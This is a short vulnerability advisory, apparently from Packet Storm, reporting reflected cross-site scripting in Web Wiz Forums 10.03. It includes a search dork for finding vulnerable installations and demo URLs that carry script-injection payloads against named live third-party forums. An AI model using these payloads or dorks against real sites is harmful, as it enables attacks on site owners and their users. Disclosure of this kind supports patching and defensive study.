Web Wiz Forums version 10.03 suffers from a cross site scripting vulnerability.
40954aa232d1b3c0c7bc07c69d9c3e7c38291dd5e25c2e9d22843fcafb58ada6###################################################################################
# Exploit Title: web wiz forums 10.03 Cross Site Scripting Vulnerability
#
# Google Dork: intext:"powered by web wiz forums 10.03"
#
# Date: 08/24/2012
#
# Author: Crim3R
#
# download Link : http://www.webwiz.co.uk/web-wiz-forums/forum-downloads.htm
#
# Tested on: all
#
###################################################################################
======================================
the searchIn ThreadPage in post_message_form.asp file is Vulnerable to Cross
Site Scripting
also ForumID parametr in forum_members.asp file
Note : Lower Versions can also be Vulnerable
D3M0 :
http://www.agni.gr/message_boards/forum_members.asp?find=S&ForumID=%22%3E%3Cscript%3Ealert(0);%3C/script%3E
http://www.canadianracer.com/forum/forum_members.asp?find=S&ForumID=%22%3E%3Cscript%3Ealert(0);%3C/script%3E
http://www.agni.gr/message_boards/post_message_form.asp?ForumID=63&mode=new&PagePosition=0&ReturnPage=Thread&ThreadPage="><script>alert(0);</script>&TopicID=57676
===============Crim3R@Att.Net=========
$Home = %00
thanks to : 2MzRp - Mikili - 0x0ptim0us - iC0d3R - farbodmahini & Amir
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed